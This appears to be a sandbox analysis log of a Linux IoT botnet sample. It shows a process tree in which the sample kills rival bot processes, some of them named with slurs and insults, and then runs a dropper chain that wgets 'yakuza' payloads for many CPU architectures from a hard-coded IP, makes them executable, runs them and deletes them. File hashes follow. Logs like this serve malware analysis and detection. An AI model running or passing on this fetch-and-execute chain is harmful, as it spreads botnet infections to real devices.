- Reads CPU attributes
- Reads runtime system information
PID:1096
-
-
/bin/busyboxbusybox pkill -9 insomni4⤵PID:1097
-
-
-
/bin/shsh -c "pkill -9 640277 || busybox pkill -9 640277"3⤵PID:1098
-
/usr/bin/pkillpkill -9 6402774⤵PID:1099
-
-
/bin/busyboxbusybox pkill -9 6402774⤵PID:1100
-
-
-
/bin/shsh -c "pkill -9 SoraBeReppin1337 || busybox pkill -9 SoraBeReppin1337"3⤵PID:1101
-
/usr/bin/pkillpkill -9 SoraBeReppin13374⤵
- Reads CPU attributes
PID:1102
-
-
/bin/busyboxbusybox pkill -9 SoraBeReppin13374⤵PID:1103
-
-
-
/bin/shsh -c "pkill -9 ipcamCache || busybox pkill -9 ipcamCache"3⤵
- System Network Configuration Discovery
PID:1104 -
/usr/bin/pkillpkill -9 ipcamCache4⤵
- Reads CPU attributes
- Reads runtime system information
- System Network Configuration Discovery
PID:1105
-
-
/bin/busyboxbusybox pkill -9 ipcamCache4⤵
- System Network Configuration Discovery
PID:1106
-
-
-
/bin/shsh -c "pkill -9 66tlGg9Q || busybox pkill -9 66tlGg9Q"3⤵PID:1107
-
/usr/bin/pkillpkill -9 66tlGg9Q4⤵
- Reads CPU attributes
PID:1108
-
-
/bin/busyboxbusybox pkill -9 66tlGg9Q4⤵PID:1109
-
-
-
/bin/shsh -c "pkill -9 T || busybox pkill -9 T"3⤵PID:1110
-
/usr/bin/pkillpkill -9 T4⤵
- Reads runtime system information
PID:1111
-
-
/bin/busyboxbusybox pkill -9 T4⤵PID:1112
-
-
-
/bin/shsh -c "pkill -9 jUYfouyf87 || busybox pkill -9 jUYfouyf87"3⤵PID:1113
-
/usr/bin/pkillpkill -9 jUYfouyf874⤵
- Reads CPU attributes
PID:1114
-
-
/bin/busyboxbusybox pkill -9 jUYfouyf874⤵PID:1115
-
-
-
/bin/shsh -c "pkill -9 6ke3 || busybox pkill -9 6ke3"3⤵PID:1116
-
/usr/bin/pkillpkill -9 6ke34⤵
- Reads runtime system information
PID:1117
-
-
/bin/busyboxbusybox pkill -9 6ke34⤵PID:1118
-
-
-
/bin/shsh -c "pkill -9 TOKYO3 || busybox pkill -9 TOKYO3"3⤵PID:1119
-
/usr/bin/pkillpkill -9 TOKYO34⤵
- Reads runtime system information
PID:1120
-
-
/bin/busyboxbusybox pkill -9 TOKYO34⤵PID:1121
-
-
-
/bin/shsh -c "pkill -9 lyEeaXul2dULCVxh || busybox pkill -9 lyEeaXul2dULCVxh"3⤵PID:1122
-
/usr/bin/pkillpkill -9 lyEeaXul2dULCVxh4⤵
- Reads runtime system information
PID:1123
-
-
/bin/busyboxbusybox pkill -9 lyEeaXul2dULCVxh4⤵PID:1124
-
-
-
/bin/shsh -c "pkill -9 93OfjHZ2z || busybox pkill -9 93OfjHZ2z"3⤵PID:1125
-
/usr/bin/pkillpkill -9 93OfjHZ2z4⤵PID:1126
-
-
/bin/busyboxbusybox pkill -9 93OfjHZ2z4⤵PID:1127
-
-
-
/bin/shsh -c "pkill -9 TY2gD6MZvKc7KU6r || busybox pkill -9 TY2gD6MZvKc7KU6r"3⤵PID:1128
-
/usr/bin/pkillpkill -9 TY2gD6MZvKc7KU6r4⤵
- Reads runtime system information
PID:1129
-
-
/bin/busyboxbusybox pkill -9 TY2gD6MZvKc7KU6r4⤵PID:1130
-
-
-
/bin/shsh -c "pkill -9 mMkiy6f87l || busybox pkill -9 mMkiy6f87l"3⤵PID:1131
-
/usr/bin/pkillpkill -9 mMkiy6f87l4⤵
- Reads CPU attributes
PID:1132
-
-
/bin/busyboxbusybox pkill -9 mMkiy6f87l4⤵PID:1133
-
-
-
/bin/shsh -c "pkill -9 A023UU4U24UIU || busybox pkill -9 A023UU4U24UIU"3⤵PID:1134
-
/usr/bin/pkillpkill -9 A023UU4U24UIU4⤵PID:1135
-
-
/bin/busyboxbusybox pkill -9 A023UU4U24UIU4⤵PID:1136
-
-
-
/bin/shsh -c "pkill -9 TheWeeknd || busybox pkill -9 TheWeeknd"3⤵PID:1137
-
/usr/bin/pkillpkill -9 TheWeeknd4⤵
- Reads runtime system information
PID:1138
-
-
/bin/busyboxbusybox pkill -9 TheWeeknd4⤵PID:1139
-
-
-
/bin/shsh -c "pkill -9 mioribitches || busybox pkill -9 mioribitches"3⤵PID:1140
-
/usr/bin/pkillpkill -9 mioribitches4⤵
- Reads CPU attributes
PID:1141
-
-
/bin/busyboxbusybox pkill -9 mioribitches4⤵PID:1142
-
-
-
/bin/shsh -c "pkill -9 A5p9 || busybox pkill -9 A5p9"3⤵PID:1143
-
/usr/bin/pkillpkill -9 A5p94⤵PID:1144
-
-
/bin/busyboxbusybox pkill -9 A5p94⤵PID:1145
-
-
-
/bin/shsh -c "pkill -9 TheWeeknds || busybox pkill -9 TheWeeknds"3⤵PID:1146
-
/usr/bin/pkillpkill -9 TheWeeknds4⤵PID:1147
-
-
/bin/busyboxbusybox pkill -9 TheWeeknds4⤵PID:1148
-
-
-
/bin/shsh -c "pkill -9 mnblkjpoi || busybox pkill -9 mnblkjpoi"3⤵PID:1149
-
/usr/bin/pkillpkill -9 mnblkjpoi4⤵
- Reads CPU attributes
PID:1150
-
-
/bin/busyboxbusybox pkill -9 mnblkjpoi4⤵PID:1151
-
-
-
/bin/shsh -c "pkill -9 AbAd || busybox pkill -9 AbAd"3⤵PID:1152
-
/usr/bin/pkillpkill -9 AbAd4⤵PID:1153
-
-
/bin/busyboxbusybox pkill -9 AbAd4⤵PID:1154
-
-
-
/bin/shsh -c "pkill -9 Tokyos || busybox pkill -9 Tokyos"3⤵PID:1155
-
/usr/bin/pkillpkill -9 Tokyos4⤵
- Reads CPU attributes
PID:1156
-
-
/bin/busyboxbusybox pkill -9 Tokyos4⤵PID:1157
-
-
-
/bin/shsh -c "pkill -9 neb || busybox pkill -9 neb"3⤵PID:1158
-
/usr/bin/pkillpkill -9 neb4⤵
- Reads runtime system information
PID:1159
-
-
/bin/busyboxbusybox pkill -9 neb4⤵PID:1160
-
-
-
/bin/shsh -c "pkill -9 Akiru || busybox pkill -9 Akiru"3⤵PID:1161
-
/usr/bin/pkillpkill -9 Akiru4⤵
- Reads CPU attributes
PID:1162
-
-
/bin/busyboxbusybox pkill -9 Akiru4⤵PID:1163
-
-
-
/bin/shsh -c "pkill -9 U8inTz || busybox pkill -9 U8inTz"3⤵PID:1164
-
/usr/bin/pkillpkill -9 U8inTz4⤵PID:1165
-
-
/bin/busyboxbusybox pkill -9 U8inTz4⤵PID:1166
-
-
-
/bin/shsh -c "pkill -9 netstats || busybox pkill -9 netstats"3⤵PID:1167
-
/usr/bin/pkillpkill -9 netstats4⤵
- Reads CPU attributes
PID:1168
-
-
/bin/busyboxbusybox pkill -9 netstats4⤵PID:1169
-
-
-
/bin/shsh -c "pkill -9 Alex || busybox pkill -9 Alex"3⤵PID:1170
-
/usr/bin/pkillpkill -9 Alex4⤵
- Reads CPU attributes
- Reads runtime system information
PID:1171
-
-
/bin/busyboxbusybox pkill -9 Alex4⤵PID:1172
-
-
-
/bin/shsh -c "pkill -9 W9RCAKM20T || busybox pkill -9 W9RCAKM20T"3⤵PID:1173
-
/usr/bin/pkillpkill -9 W9RCAKM20T4⤵PID:1174
-
-
/bin/busyboxbusybox pkill -9 W9RCAKM20T4⤵PID:1175
-
-
-
/bin/shsh -c "pkill -9 newnetword || busybox pkill -9 newnetword"3⤵PID:1176
-
/usr/bin/pkillpkill -9 newnetword4⤵PID:1177
-
-
/bin/busyboxbusybox pkill -9 newnetword4⤵PID:1178
-
-
-
/bin/shsh -c "pkill -9 Ayo215 || busybox pkill -9 Ayo215"3⤵PID:1179
-
/usr/bin/pkillpkill -9 Ayo2154⤵
- Reads CPU attributes
- Reads runtime system information
PID:1180
-
-
/bin/busyboxbusybox pkill -9 Ayo2154⤵PID:1181
-
-
-
/bin/shsh -c "pkill -9 Word || busybox pkill -9 Word"3⤵PID:1182
-
/usr/bin/pkillpkill -9 Word4⤵
- Reads CPU attributes
- Reads runtime system information
PID:1183
-
-
/bin/busyboxbusybox pkill -9 Word4⤵PID:1184
-
-
-
/bin/shsh -c "pkill -9 nloads || busybox pkill -9 nloads"3⤵PID:1185
-
/usr/bin/pkillpkill -9 nloads4⤵
- Reads CPU attributes
PID:1186
-
-
/bin/busyboxbusybox pkill -9 nloads4⤵PID:1187
-
-
-
/bin/shsh -c "pkill -9 BAdAsV || busybox pkill -9 BAdAsV"3⤵PID:1188
-
/usr/bin/pkillpkill -9 BAdAsV4⤵
- Reads CPU attributes
PID:1189
-
-
/bin/busyboxbusybox pkill -9 BAdAsV4⤵PID:1190
-
-
-
/bin/shsh -c "pkill -9 Wordmane || busybox pkill -9 Wordmane"3⤵PID:1191
-
/usr/bin/pkillpkill -9 Wordmane4⤵
- Reads CPU attributes
- Reads runtime system information
PID:1192
-
-
/bin/busyboxbusybox pkill -9 Wordmane4⤵PID:1193
-
-
-
/bin/shsh -c "pkill -9 notyakuzaa || busybox pkill -9 notyakuzaa"3⤵PID:1194
-
/usr/bin/pkillpkill -9 notyakuzaa4⤵PID:1195
-
-
/bin/busyboxbusybox pkill -9 notyakuzaa4⤵PID:1196
-
-
-
/bin/shsh -c "pkill -9 Belch || busybox pkill -9 Belch"3⤵PID:1197
-
/usr/bin/pkillpkill -9 Belch4⤵
- Reads CPU attributes
- Reads runtime system information
PID:1198
-
-
/bin/busyboxbusybox pkill -9 Belch4⤵PID:1199
-
-
-
/bin/shsh -c "pkill -9 Wordnets || busybox pkill -9 Wordnets"3⤵PID:1200
-
/usr/bin/pkillpkill -9 Wordnets4⤵
- Reads CPU attributes
PID:1201
-
-
/bin/busyboxbusybox pkill -9 Wordnets4⤵PID:1202
-
-
-
/bin/shsh -c "pkill -9 obp || busybox pkill -9 obp"3⤵PID:1203
-
/usr/bin/pkillpkill -9 obp4⤵
- Reads CPU attributes
PID:1204
-
-
/bin/busyboxbusybox pkill -9 obp4⤵PID:1205
-
-
-
/bin/shsh -c "pkill -9 BigN0gg0r420 || busybox pkill -9 BigN0gg0r420"3⤵PID:1206
-
/usr/bin/pkillpkill -9 BigN0gg0r4204⤵
- Reads CPU attributes
- Reads runtime system information
PID:1207
-
-
/bin/busyboxbusybox pkill -9 BigN0gg0r4204⤵PID:1208
-
-
-
/bin/shsh -c "pkill -9 X0102I34f || busybox pkill -9 X0102I34f"3⤵PID:1209
-
/usr/bin/pkillpkill -9 X0102I34f4⤵PID:1210
-
-
/bin/busyboxbusybox pkill -9 X0102I34f4⤵PID:1211
-
-
-
/bin/shsh -c "pkill -9 ofhasfhiafhoi || busybox pkill -9 ofhasfhiafhoi"3⤵PID:1212
-
/usr/bin/pkillpkill -9 ofhasfhiafhoi4⤵
- Reads CPU attributes
PID:1213
-
-
/bin/busyboxbusybox pkill -9 ofhasfhiafhoi4⤵PID:1214
-
-
-
/bin/shsh -c "pkill -9 BzSxLxBxeY || busybox pkill -9 BzSxLxBxeY"3⤵PID:1215
-
/usr/bin/pkillpkill -9 BzSxLxBxeY4⤵
- Reads CPU attributes
- Reads runtime system information
PID:1216
-
-
/bin/busyboxbusybox pkill -9 BzSxLxBxeY4⤵PID:1217
-
-
-
/bin/shsh -c "pkill -9 X19I239124UIU || busybox pkill -9 X19I239124UIU"3⤵PID:1218
-
/usr/bin/pkillpkill -9 X19I239124UIU4⤵
- Reads CPU attributes
PID:1219
-
-
/bin/busyboxbusybox pkill -9 X19I239124UIU4⤵PID:1220
-
-
-
/bin/shsh -c "pkill -9 oism || busybox pkill -9 oism"3⤵PID:1221
-
/usr/bin/pkillpkill -9 oism4⤵
- Reads runtime system information
PID:1222
-
-
/bin/busyboxbusybox pkill -9 oism4⤵PID:1223
-
-
-
/bin/shsh -c "pkill -9 Deported || busybox pkill -9 Deported"3⤵PID:1224
-
/usr/bin/pkillpkill -9 Deported4⤵PID:1225
-
-
/bin/busyboxbusybox pkill -9 Deported4⤵PID:1226
-
-
-
/bin/shsh -c "pkill -9 XSHJEHHEIIHWO || busybox pkill -9 XSHJEHHEIIHWO"3⤵PID:1227
-
/usr/bin/pkillpkill -9 XSHJEHHEIIHWO4⤵
- Reads CPU attributes
PID:1228
-
-
/bin/busyboxbusybox pkill -9 XSHJEHHEIIHWO4⤵PID:1229
-
-
-
/bin/shsh -c "pkill -9 olsVNwo12 || busybox pkill -9 olsVNwo12"3⤵PID:1230
-
/usr/bin/pkillpkill -9 olsVNwo124⤵
- Reads CPU attributes
- Reads runtime system information
PID:1231
-
-
/bin/busyboxbusybox pkill -9 olsVNwo124⤵PID:1232
-
-
-
/bin/shsh -c "pkill -9 DeportedDeported || busybox pkill -9 DeportedDeported"3⤵PID:1233
-
/usr/bin/pkillpkill -9 DeportedDeported4⤵
- Reads CPU attributes
- Reads runtime system information
PID:1234
-
-
/bin/busyboxbusybox pkill -9 DeportedDeported4⤵PID:1235
-
-
-
/bin/shsh -c "pkill -9 XkTer0GbA1 || busybox pkill -9 XkTer0GbA1"3⤵PID:1236
-
/usr/bin/pkillpkill -9 XkTer0GbA14⤵
- Reads CPU attributes
PID:1237
-
-
/bin/busyboxbusybox pkill -9 XkTer0GbA14⤵PID:1238
-
-
-
/bin/shsh -c "pkill -9 onry0v03 || busybox pkill -9 onry0v03"3⤵PID:1239
-
/usr/bin/pkillpkill -9 onry0v034⤵
- Reads CPU attributes
PID:1240
-
-
/bin/busyboxbusybox pkill -9 onry0v034⤵PID:1241
-
-
-
/bin/shsh -c "pkill -9 FortniteDownLOLZ || busybox pkill -9 FortniteDownLOLZ"3⤵PID:1242
-
/usr/bin/pkillpkill -9 FortniteDownLOLZ4⤵PID:1243
-
-
/bin/busyboxbusybox pkill -9 FortniteDownLOLZ4⤵PID:1244
-
-
-
/bin/shsh -c "pkill -9 Y0urM0mGay || busybox pkill -9 Y0urM0mGay"3⤵PID:1245
-
/usr/bin/pkillpkill -9 Y0urM0mGay4⤵
- Reads CPU attributes
PID:1246
-
-
/bin/busyboxbusybox pkill -9 Y0urM0mGay4⤵PID:1247
-
-
-
/bin/shsh -c "pkill -9 pussyfartlmaojk || busybox pkill -9 pussyfartlmaojk"3⤵PID:1248
-
/usr/bin/pkillpkill -9 pussyfartlmaojk4⤵PID:1249
-
-
/bin/busyboxbusybox pkill -9 pussyfartlmaojk4⤵PID:1250
-
-
-
/bin/shsh -c "pkill -9 GrAcEnIgGeRaNn || busybox pkill -9 GrAcEnIgGeRaNn"3⤵PID:1251
-
/usr/bin/pkillpkill -9 GrAcEnIgGeRaNn4⤵
- Reads CPU attributes
- Reads runtime system information
PID:1252
-
-
/bin/busyboxbusybox pkill -9 GrAcEnIgGeRaNn4⤵PID:1253
-
-
-
/bin/shsh -c "pkill -9 YvdGkqndCO || busybox pkill -9 YvdGkqndCO"3⤵PID:1254
-
/usr/bin/pkillpkill -9 YvdGkqndCO4⤵PID:1255
-
-
/bin/busyboxbusybox pkill -9 YvdGkqndCO4⤵PID:1256
-
-
-
/bin/shsh -c "pkill -9 qGeoRBe6BE || busybox pkill -9 qGeoRBe6BE"3⤵PID:1257
-
/usr/bin/pkillpkill -9 qGeoRBe6BE4⤵
- Reads CPU attributes
- Reads runtime system information
PID:1258
-
-
/bin/busyboxbusybox pkill -9 qGeoRBe6BE4⤵PID:1259
-
-
-
/bin/shsh -c "pkill -9 GuiltyCrown || busybox pkill -9 GuiltyCrown"3⤵PID:1260
-
/usr/bin/pkillpkill -9 GuiltyCrown4⤵PID:1261
-
-
/bin/busyboxbusybox pkill -9 GuiltyCrown4⤵PID:1262
-
-
-
/bin/shsh -c "pkill -9 ZEuS69 || busybox pkill -9 ZEuS69"3⤵PID:1263
-
/usr/bin/pkillpkill -9 ZEuS694⤵
- Reads CPU attributes
PID:1264
-
-
/bin/busyboxbusybox pkill -9 ZEuS694⤵PID:1265
-
-
-
-
/bin/rmrm -rf yakuza.mipsel2⤵
- System Network Configuration Discovery
PID:749
-
-
/usr/bin/wgetwget http://82.57.165.95/yakuza.sh2⤵
- Writes file to tmp directory
PID:751
-
-
/bin/chmodchmod +x yakuza.sh2⤵
- File and Directory Permissions Modification
PID:753
-
-
/tmp/yakuza.sh./yakuza.sh2⤵PID:755
-
-
/bin/rmrm -rf yakuza.sh2⤵PID:758
-
-
/usr/bin/wgetwget http://82.57.165.95/yakuza.x862⤵
- Writes file to tmp directory
PID:760
-
-
/bin/chmodchmod +x yakuza.x862⤵
- File and Directory Permissions Modification
PID:763
-
-
/tmp/yakuza.x86./yakuza.x862⤵PID:764
-
-
/bin/rmrm -rf yakuza.x862⤵PID:767
-
-
/usr/bin/wgetwget http://82.57.165.95/yakuza.arm62⤵
- Writes file to tmp directory
PID:768
-
-
/bin/chmodchmod +x yakuza.arm62⤵
- File and Directory Permissions Modification
PID:772
-
-
/tmp/yakuza.arm6./yakuza.arm62⤵PID:773
-
-
/bin/rmrm -rf yakuza.arm62⤵PID:775
-
-
/usr/bin/wgetwget http://82.57.165.95/yakuza.i6862⤵
- Writes file to tmp directory
PID:776
-
-
/bin/chmodchmod +x yakuza.i6862⤵
- File and Directory Permissions Modification
PID:779
-
-
/tmp/yakuza.i686./yakuza.i6862⤵PID:781
-
-
/bin/rmrm -rf yakuza.i6862⤵PID:783
-
-
/usr/bin/wgetwget http://82.57.165.95/yakuza.ppc2⤵
- Writes file to tmp directory
PID:784
-
-
/bin/chmodchmod +x yakuza.ppc2⤵
- File and Directory Permissions Modification
PID:787
-
-
/tmp/yakuza.ppc./yakuza.ppc2⤵PID:788
-
-
/bin/rmrm -rf yakuza.ppc2⤵PID:791
-
-
/usr/bin/wgetwget http://82.57.165.95/yakuza.i5862⤵
- Writes file to tmp directory
PID:792
-
-
/bin/chmodchmod +x yakuza.i5862⤵
- File and Directory Permissions Modification
PID:793
-
-
/tmp/yakuza.i586./yakuza.i5862⤵PID:795
-
-
/bin/rmrm -rf yakuza.i5862⤵PID:798
-
-
/usr/bin/wgetwget http://82.57.165.95/yakuza.m68k2⤵
- Writes file to tmp directory
PID:799
-
-
/bin/chmodchmod +x yakuza.m68k2⤵
- File and Directory Permissions Modification
PID:805
-
-
/tmp/yakuza.m68k./yakuza.m68k2⤵PID:807
-
-
/bin/rmrm -rf yakuza.m68k2⤵PID:812
-
-
/usr/bin/wgetwget http://82.57.165.95/yakuza.arm42⤵
- Writes file to tmp directory
PID:813
-
-
/bin/chmodchmod +x yakuza.arm42⤵
- File and Directory Permissions Modification
PID:821
-
-
/tmp/yakuza.arm4./yakuza.arm42⤵PID:822
-
-
/bin/rmrm -rf yakuza.arm42⤵PID:826
-
-
/usr/bin/wgetwget http://82.57.165.95/yakuza.arm52⤵
- Writes file to tmp directory
PID:829
-
-
/bin/chmodchmod +x yakuza.arm52⤵
- File and Directory Permissions Modification
PID:838
-
-
/tmp/yakuza.arm5./yakuza.arm52⤵PID:840
-
-
/bin/rmrm -rf yakuza.arm52⤵PID:844
-
-
/usr/bin/wgetwget http://82.57.165.95/yakuza.arm72⤵
- Writes file to tmp directory
PID:845
-
-
/bin/chmodchmod +x yakuza.arm72⤵
- File and Directory Permissions Modification
PID:854
-
-
/tmp/yakuza.arm7./yakuza.arm72⤵PID:856
-
-
/bin/rmrm -rf yakuza.arm72⤵PID:862
-
-
/usr/bin/wgetwget http://82.57.165.95/yakuza.sparc2⤵
- Writes file to tmp directory
PID:863
-
-
/bin/chmodchmod +x yakuza.sparc2⤵
- File and Directory Permissions Modification
PID:873
-
-
/tmp/yakuza.sparc./yakuza.sparc2⤵PID:875
-
-
/bin/rmrm -rf yakuza.sparc2⤵PID:879
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
183KB
MD56b663dec7156331eee76ef1728d52b73
SHA150713911df22fd9f90a3175accf83f9ec7d5b486
SHA256d8eeeeaf346781bc005b5bd15fc2fe90e183cbc57ebeef44d4c266b3b099b71d
SHA512b647d10b39119dec04e757f8386f3cf808a0b6ffcb27b592145f328e213e270dd8977f323f267849a70f6be6a7bee51ec2e918ddfcf01fcaa0a1eb6596793013